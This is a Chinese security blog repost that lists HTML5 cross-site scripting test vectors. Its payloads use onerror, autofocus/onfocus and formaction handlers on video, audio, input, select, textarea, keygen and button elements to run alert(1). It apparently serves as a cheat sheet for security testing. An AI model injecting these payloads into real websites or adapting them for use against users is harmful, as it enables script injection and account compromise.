HTML5下的XSS测试代码

独自等待 2017年5月12日02:56:58评论1,476 views字数 442阅读1分28秒阅读模式

国外某童鞋收集整理的针对HTML5的XSS测试代码。

HTML5下的XSS测试代码

<video> <source onerror="javascript:alert(1)">

引入媒体类测试代码Example:

<video onerror="javascript:alert(1)"><source>
<audio onerror="javascript:alert(1)"><source>

<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>

表单点击测试代码Example:

<button form=test onformchange=alert(2)>X
<form><button formaction="javascript:alert(1)">

 

 

更多HTML5 安全请访问http://html5sec.org

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
独自等待
  • 本文由 发表于 2017年5月12日02:56:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HTML5下的XSS测试代码https://cn-sec.com/archives/50450.html

发表评论

匿名网友 填写信息